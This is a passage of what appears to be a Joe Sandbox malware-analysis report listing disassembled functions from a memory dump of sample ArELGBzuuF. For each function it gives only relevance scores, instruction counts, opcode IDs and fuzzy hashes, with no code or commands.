                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 166a0eafc12af9ef16b0f3e4149627a604b6a225ed904dc2253b66b7c89d2a98
                    • Instruction ID: d72d28d1901c0d8a427f7ecaa018b46ff1139dc995d553f2589f19180bc5f535
                    • Opcode Fuzzy Hash: 166a0eafc12af9ef16b0f3e4149627a604b6a225ed904dc2253b66b7c89d2a98
                    • Instruction Fuzzy Hash: 79211931E2C91A9FDB58EB5CD491AA8F7A1FF48350F14817AD40ED3686CF24AC52CB84
                    Function 00007FF848F20990 Relevance: .1, Instructions: 87COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 30aaeef2ab00097fb4ec5287f3094c7427112ade04629b38065b85087c4d6ea7
                    • Instruction ID: 7dbd10d68963aa2125b2087481fb0b175bb1faaa393229dce9acdaa657792136
                    • Opcode Fuzzy Hash: 30aaeef2ab00097fb4ec5287f3094c7427112ade04629b38065b85087c4d6ea7
                    • Instruction Fuzzy Hash: F4313B3185C5D64FF319B71894606787B91EFD2350F1886FAC88BCB5E7CA2DA881C785
                    Function 00007FF848F14555 Relevance: .1, Instructions: 87COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 77182cf138d933e69eca64e1adbf44f10c04b2aacbc5271ac18f4e719aa6ba7b
                    • Instruction ID: df87931a0863ee2699671f6edfee77f8bc577cf62dd6e894d4ec2414421ba21f
                    • Opcode Fuzzy Hash: 77182cf138d933e69eca64e1adbf44f10c04b2aacbc5271ac18f4e719aa6ba7b
                    • Instruction Fuzzy Hash: FF31E271C1E6C94FE755EF2898581A97FB2FF95340F4401BAE808C72D7CB285948C795
                    Function 00007FF848F21AA5 Relevance: .1, Instructions: 86COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f76a5783f2bc03698dbbe8ab370de39cb47e30788b4aede0cca2624c3e7bd360
                    • Instruction ID: 2950a0d9a9405dbb8940956ba5b67cd913d7d9d7a9a1a691ede3ae81eb2de765
                    • Opcode Fuzzy Hash: f76a5783f2bc03698dbbe8ab370de39cb47e30788b4aede0cca2624c3e7bd360
                    • Instruction Fuzzy Hash: A6314630D1C54A8FEBA8FB9494945BD7BB5FF54340F5001BAD00AD21D1EB3AB980CB89
                    Function 00007FF848F1DDB2 Relevance: .1, Instructions: 85COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0c9670493d9267b83f457e15248e9e899986c9b64b09c2ff1c4dc5544a130825
                    • Instruction ID: a970ba7f9054751420594567e0023db4d8a340e423da8f8ec11aac1ab9b90c31
                    • Opcode Fuzzy Hash: 0c9670493d9267b83f457e15248e9e899986c9b64b09c2ff1c4dc5544a130825
                    • Instruction Fuzzy Hash: 4121D431E1881D9FDF99EB58C4A5AA9B7B1FB68301F0041AAD00EE3291CB35AD818B44
                    Function 00007FF848F13F00 Relevance: .1, Instructions: 85COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c026618e3181ed2b53a86b591d2a723d27d159c3b7f9e9eae102f5851f4e0b72
                    • Instruction ID: 03fdd4213e8383bcaa0474391f955f8fcc6c2cf9dc7c183b60786606ab204c12
                    • Opcode Fuzzy Hash: c026618e3181ed2b53a86b591d2a723d27d159c3b7f9e9eae102f5851f4e0b72
                    • Instruction Fuzzy Hash: 48314630D1961A8FE7A8EB28C8593B9B3B2EF94750F1005B9D45DD32D2CF39A8818B44
                    Function 00007FF848F1E893 Relevance: .1, Instructions: 83COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7dd410c95e2df712b76dacae456f4dc84fe43a971f58aef221f07ae93ff5a47f
                    • Instruction ID: f30384a9874cd99be46bc3b9ee0d9c3e3852e3bde42e2be1f45bb3113ecf331f
                    • Opcode Fuzzy Hash: 7dd410c95e2df712b76dacae456f4dc84fe43a971f58aef221f07ae93ff5a47f
                    • Instruction Fuzzy Hash: 83218E30E0C6098FEB98EB58D845A78B7E1FF49361F5401BAE04EC36D2CF29AC418B44
                    Function 00007FF848F16895 Relevance: .1, Instructions: 82COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: df08474cb89f0f3eb121a9a45657e2f6e69d026a2748f431b34027e5578ea135
                    • Instruction ID: 089a797c6c67ccf9256c027f545600a8870ce2b5d24f6001cdc239974358d449
                    • Opcode Fuzzy Hash: df08474cb89f0f3eb121a9a45657e2f6e69d026a2748f431b34027e5578ea135
                    • Instruction Fuzzy Hash: AC215772D0921A8FEB58EFA494642FEB7F0EF19351F50013AE009A22C1DB795E54CB95
                    Function 00007FF848F2E541 Relevance: .1, Instructions: 81COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 367606a9e464e9067752b02f1dc50bb47bbb0592dc067cf41137a5e1a1392bb6
                    • Instruction ID: e314921d765f9f73cc5254a34af002874276c184bd33eb09442602f4ecd4ed8c
                    • Opcode Fuzzy Hash: 367606a9e464e9067752b02f1dc50bb47bbb0592dc067cf41137a5e1a1392bb6
                    • Instruction Fuzzy Hash: 08218B70D1D6898FDB81EBA8D8546FDBBF1EF0A300F0401A6E008E3192DB38A955CB15
                    Function 00007FF848F13F0B Relevance: .1, Instructions: 77COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2cf8c4ef1fd5ea93dee71cf8a660ddf409e6e645183de5cc2c7f90d045955abb
                    • Instruction ID: ed5e5206ad14ce1d0ccd3b8641a0fb96afb6e111f8f2715060a4d0803c538994
                    • Opcode Fuzzy Hash: 2cf8c4ef1fd5ea93dee71cf8a660ddf409e6e645183de5cc2c7f90d045955abb
                    • Instruction Fuzzy Hash: C221BD31D0D20A8EE768AF28C8556B9B3B1EF94790F100079D01D932C2CF39AC81CB08
                    Function 00007FF848F1D52D Relevance: .1, Instructions: 75COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0e26232000f53cd91825f98013532b4a1cfc36bd673263aa7089d2ff0176485e
                    • Instruction ID: e98b7ac24372b4dca626272de0533ad6e96657a6035aaa81044a8d9c1207eee1
                    • Opcode Fuzzy Hash: 0e26232000f53cd91825f98013532b4a1cfc36bd673263aa7089d2ff0176485e
                    • Instruction Fuzzy Hash: 1E213931D1D94EDFDB84EB58D850AADBBB1FF58354F50016AD00AE3281DB35A9058B58
                    Function 00007FF848F11048 Relevance: .1, Instructions: 75COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2d448dd805003af3dffccd0ac80e88b90924f92edd40bb80e7e3ef32b8735845
                    • Instruction ID: 0a2ac629aadaa469dbfd45bd736e55848d8c08d3c2cf24affe03f57316a70283
                    • Opcode Fuzzy Hash: 2d448dd805003af3dffccd0ac80e88b90924f92edd40bb80e7e3ef32b8735845
                    • Instruction Fuzzy Hash: C921B270A1890D9FCF84EF88D495EEEBBB1FF68301F100169E509E3255CB34E8418B84
                    Function 00007FF848F13F43 Relevance: .1, Instructions: 73COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e6df0096a32ba576641b09c259b65e996351c0e4be2a4132fec044ee697acc16
                    • Instruction ID: b58adcbf66df8b035278004d363a85f4a97932d9f5701317c471a47025363d79
                    • Opcode Fuzzy Hash: e6df0096a32ba576641b09c259b65e996351c0e4be2a4132fec044ee697acc16
                    • Instruction Fuzzy Hash: 3F215B30D0E7494FE769AB68C8197B9BBB1EF95750F0404BAD009D72D2CE389884CB55
                    Function 00007FF848F1E8F7 Relevance: .1, Instructions: 72COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 276fc2d73efbf482e978d6dcacc1bfb5938ab4455ce684e74d1fee97bbe7a595
                    • Instruction ID: 6603ba27cf4f3f076645a7993406534ef653f7e8348a2fea070647cab0afd1b8
                    • Opcode Fuzzy Hash: 276fc2d73efbf482e978d6dcacc1bfb5938ab4455ce684e74d1fee97bbe7a595
                    • Instruction Fuzzy Hash: E0115130A0CA188FDB98EB18D895AA8B7F1FF59311F1041AFD04ED76A2CF31AC418B44
                    Function 00007FF848F23DAF Relevance: .1, Instructions: 69COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 37e1a38a4d5b5889eb40066e1c56a924bb522ee544841efd63a180db331b63f0
                    • Instruction ID: d4adc069cf0d3979d65b1148403a891fd8b4cb7e94a243876f92434e2dbf4f2e
                    • Opcode Fuzzy Hash: 37e1a38a4d5b5889eb40066e1c56a924bb522ee544841efd63a180db331b63f0
                    • Instruction Fuzzy Hash: 34111371A1895D8FDF84EB9CE844AEDBBF1FF68301F04017AE509E3291DB71A8448B80
                    Function 00007FF848F13FC1 Relevance: .1, Instructions: 66COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f23da67866e266d801fb815234f6678855a6c72313d749dd3a34a2f69d0c60db
                    • Instruction ID: d2fc57227c781dc3a8bcdd7eb0a1dc8404783925b6c8a6c3a2a2c3d412c3f078
                    • Opcode Fuzzy Hash: f23da67866e266d801fb815234f6678855a6c72313d749dd3a34a2f69d0c60db
                    • Instruction Fuzzy Hash: 56119D3090E78A4FE766AB7488247B97BB1EF86750F0804BAD049D72D3CE289C45C756
                    Function 00007FF848F1FA40 Relevance: .1, Instructions: 63COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 14848c074e3a037dcc9303ebbe2242513491657ce5cad397e2a2c548501736c1
                    • Instruction ID: 0670c8819f06d89fed0e177a673f22f99ff5e96bc95eb2a41e6c61a7b3acf4bc
                    • Opcode Fuzzy Hash: 14848c074e3a037dcc9303ebbe2242513491657ce5cad397e2a2c548501736c1
                    • Instruction Fuzzy Hash: DA11E33091DA4A8EEB65FB2480505F677E0EF54391F400A3BD48EC36D2CF2CB84987A4
                    Function 00007FF848F1E89C Relevance: .1, Instructions: 63COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2830a838655fb51e66e83fe6fb45bcecc13776ed6efb92c61c104ddc3cadba29
                    • Instruction ID: 54a00d9dea81c5a2419d8d3f68d4561700d2f75bff8cdb39c5ce82e48c439f35
                    • Opcode Fuzzy Hash: 2830a838655fb51e66e83fe6fb45bcecc13776ed6efb92c61c104ddc3cadba29
                    • Instruction Fuzzy Hash: D7117330A0D6098FEB98EB58D8556B8B3E1EF59351F0001BFD04ED36A2CF256C418B44
                    Function 00007FF848F13F62 Relevance: .1, Instructions: 63COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 251e51a8919b4733fbc261aa8a684bf5c099dd0b1f53f26f09c53bd4ec4bd854
                    • Instruction ID: d27ae30db00bd6653476d3d59dbfec71053d13b77f9ee969b722d2f8fabf74cb
                    • Opcode Fuzzy Hash: 251e51a8919b4733fbc261aa8a684bf5c099dd0b1f53f26f09c53bd4ec4bd854
                    • Instruction Fuzzy Hash: EF119E30C1D60A9FE768AB28C4097BAB6B1EF95790F101539D40DD32C1CF39AC448655
                    Function 00007FF848F17764 Relevance: .1, Instructions: 60COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 250031e6eb2bbe53c09b62bffee6833d883f0bd4fa4af50dc3f1407b03a97a61
                    • Instruction ID: 06b37513ce85dd9d6015053cdf06bbb8cd7dc7a9052f840e3e05744c0adb6e2d
                    • Opcode Fuzzy Hash: 250031e6eb2bbe53c09b62bffee6833d883f0bd4fa4af50dc3f1407b03a97a61
                    • Instruction Fuzzy Hash: 00119370A0D91D9FDB94FB68D455AADBBB1FF58341F5001AAE00DD7292DF34A881CB44
                    Function 00007FF848F1F8BE Relevance: .1, Instructions: 59COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 50e695c3d8c3bf119d694f6678771881066066ef652f53f114e9e18afb6f3680
                    • Instruction ID: f2ec9d1265e5bfef2498830bb04b175424d466808ccb6fd4a23da306b3c8ffa2
                    • Opcode Fuzzy Hash: 50e695c3d8c3bf119d694f6678771881066066ef652f53f114e9e18afb6f3680
                    • Instruction Fuzzy Hash: F311443160D60B8FEB15AB18D4102E473A0EF54391F24057BE90EC36C2CF69A884C750
                    Function 00007FF848F13F86 Relevance: .1, Instructions: 59COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fd297da374d612f008eb9b74bee7458eab2dc8df74d7b4fe8217c5614f2424d2
                    • Instruction ID: a8e4e909e57b09cee0d1eea9ecb164f6ca637da474f74849cd2534ba117fc081
                    • Opcode Fuzzy Hash: fd297da374d612f008eb9b74bee7458eab2dc8df74d7b4fe8217c5614f2424d2
                    • Instruction Fuzzy Hash: E2113A30D1D64A8EE7A8AF28C4153B966B2EF99790F141439D44D932C6CF39AC81C708
                    Function 00007FF848F13EEC Relevance: .1, Instructions: 56COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fedf6f21ffebb360383137de18d09ffa7e6d16f8ec6c13e081c6c06892ccc399
                    • Instruction ID: be6b418aafbbe60c58aea1e96f99f22a0ab15b189964b0f22227d7b8fb51b35e
                    • Opcode Fuzzy Hash: fedf6f21ffebb360383137de18d09ffa7e6d16f8ec6c13e081c6c06892ccc399
                    • Instruction Fuzzy Hash: C211A030C0E74A8FE769AF28C5193B9BBB1EF86750F041479D459D72D2CF39A8408705
                    Function 00007FF848F13F74 Relevance: .1, Instructions: 56COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e21fa984d004cf722cd16b1ccd2ac2fd6b8fc2548b2695c4edb9fd305050b37d
                    • Instruction ID: e72a59205f33e2cea0214835ddc57ffd7498614fe7c6ca4d75646f0c0090f3bc
                    • Opcode Fuzzy Hash: e21fa984d004cf722cd16b1ccd2ac2fd6b8fc2548b2695c4edb9fd305050b37d
                    • Instruction Fuzzy Hash: A0118B34D1DA4A8EE7A8AF28C4193B9B7B2EF98750F140439D40DE32C2CF39AC418748
                    Function 00007FF848F1EF29 Relevance: .1, Instructions: 54COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9ef6632aacd7d02d91938f2dd48bbfda52d447516e78df92e11d3521aec2e7b7
                    • Instruction ID: 98f766876ef48b9e3735704b21cb4c639e91317b58b93051ac31bb48bc94fce5
                    • Opcode Fuzzy Hash: 9ef6632aacd7d02d91938f2dd48bbfda52d447516e78df92e11d3521aec2e7b7
                    • Instruction Fuzzy Hash: F4018031E1DA598FEB59FBA894626ACBBA0EF4A350F19017AD44AC32C7CF2858418705
                    Function 00007FF848F13F6B Relevance: .1, Instructions: 53COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: baac23d16eebec1297173c4d4b13589fe1828433a1912e68195abaa8e3487300
                    • Instruction ID: 7e8a79d15363921daa08b58405ea7322962f6fb13c6a39fec04dbcc8e7d1a8f5
                    • Opcode Fuzzy Hash: baac23d16eebec1297173c4d4b13589fe1828433a1912e68195abaa8e3487300
                    • Instruction Fuzzy Hash: E7016970D0E64A8FE768AF24C5193B9BBB2EF89B50F041879D009E72D2CF39A8419715
                    Function 00007FF848F2275F Relevance: .0, Instructions: 50COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c36cf5ea00bbf79748bfeb13c41eea41bf30d636e29d04ca2d1467476f01f187
                    • Instruction ID: 18399f791e444a82f4bfd7c64446a74936824b01eeb0cf06a65db0e48f2be732
                    • Opcode Fuzzy Hash: c36cf5ea00bbf79748bfeb13c41eea41bf30d636e29d04ca2d1467476f01f187
                    • Instruction Fuzzy Hash: 0301C530E1892A8EDBA4EB28D8457E9B3B1EF58350F4045BAD05DE3192DF756D818B84
                    Function 00007FF848F23960 Relevance: .0, Instructions: 48COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b1c604f34cdbc32574d7992df4e2a6248de99d1ad30ba08196a511f7c8736df8
                    • Instruction ID: 3e0d8c7bc7bd0fddeb70c8b3caf504cf480e3dbfc5415e200c1b3afcc042988a
                    • Opcode Fuzzy Hash: b1c604f34cdbc32574d7992df4e2a6248de99d1ad30ba08196a511f7c8736df8
                    • Instruction Fuzzy Hash: 53015A74A0891D8FDF94EBACD884AEDB7B1FF58345F60057AE409E3296DB24A8418B41
                    Function 00007FF848F1CA60 Relevance: .0, Instructions: 45COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d5e43648602b13182d8215ce1bbac4d2b4f5c308a8927e9280cd1e8ed7772fde
                    • Instruction ID: e0f58d104f9cd8dd84868a4c60aff53c29fed4a3e9495e214d19b5123f26abc8
                    • Opcode Fuzzy Hash: d5e43648602b13182d8215ce1bbac4d2b4f5c308a8927e9280cd1e8ed7772fde
                    • Instruction Fuzzy Hash: 62012C305194064FDB88EF54D0C2DA6B361FFA4350B2482B5D4099B29FEA2CFC91C7E4
                    Function 00007FF848F1CD63 Relevance: .0, Instructions: 43COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cc6ba5533419eb2f6ef9bb745d487c06c62ba3893b1f6dce75a3e95a1cee544e
                    • Instruction ID: eac541c820d1a39ff2a92ca28a0c2cc92351f719eb055b27264acd173c191d46
                    • Opcode Fuzzy Hash: cc6ba5533419eb2f6ef9bb745d487c06c62ba3893b1f6dce75a3e95a1cee544e
                    • Instruction Fuzzy Hash: 34016231D0D65D8FDB65BB508802AFDB760EF52380F4112BAC05E570D2EF782E998B95
                    Function 00007FF848F2D494 Relevance: .0, Instructions: 41COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 550e0582784084124dd946f61ede8f60354d3f788347be47954da84aed273e17
                    • Instruction ID: 1cbb9cb80fdbf8348390fb4213a1724a62da7ae87ac336bbb252df97c7822369
                    • Opcode Fuzzy Hash: 550e0582784084124dd946f61ede8f60354d3f788347be47954da84aed273e17
                    • Instruction Fuzzy Hash: 45F0BE3110CA1C8FCB44EB99D848ADA77A4FB96324F00011AE40EC7061D731A961CB40
                    Function 00007FF848F2D49B Relevance: .0, Instructions: 40COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4fffffe9229d293523b1692184129feba3a5371212b889df90a767c4f0f5bd9b
                    • Instruction ID: ebc156c4d2572717545f43d61f1df72c828521ac8f639b2b4c6a87076e845354
                    • Opcode Fuzzy Hash: 4fffffe9229d293523b1692184129feba3a5371212b889df90a767c4f0f5bd9b
                    • Instruction Fuzzy Hash: 13F08C3114C91C9FDB58EB88E849EE677A8FB96334F00016AE40EC70A1D271A962CB90
                    Function 00007FF848F2D512 Relevance: .0, Instructions: 40COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9e8e3fd1b07853f0ce543aefee23312f62a7739d52481af9c50ee8fe008b117d
                    • Instruction ID: 268fe85a12c658891cabcd213bdd5ebdfe428b17a6447e316f5a8489384b7a08
                    • Opcode Fuzzy Hash: 9e8e3fd1b07853f0ce543aefee23312f62a7739d52481af9c50ee8fe008b117d
                    • Instruction Fuzzy Hash: 85F0A73114C91C9FDB14FF58D849EE67BA4FB96334F00011AE40EC7061D231A992C751
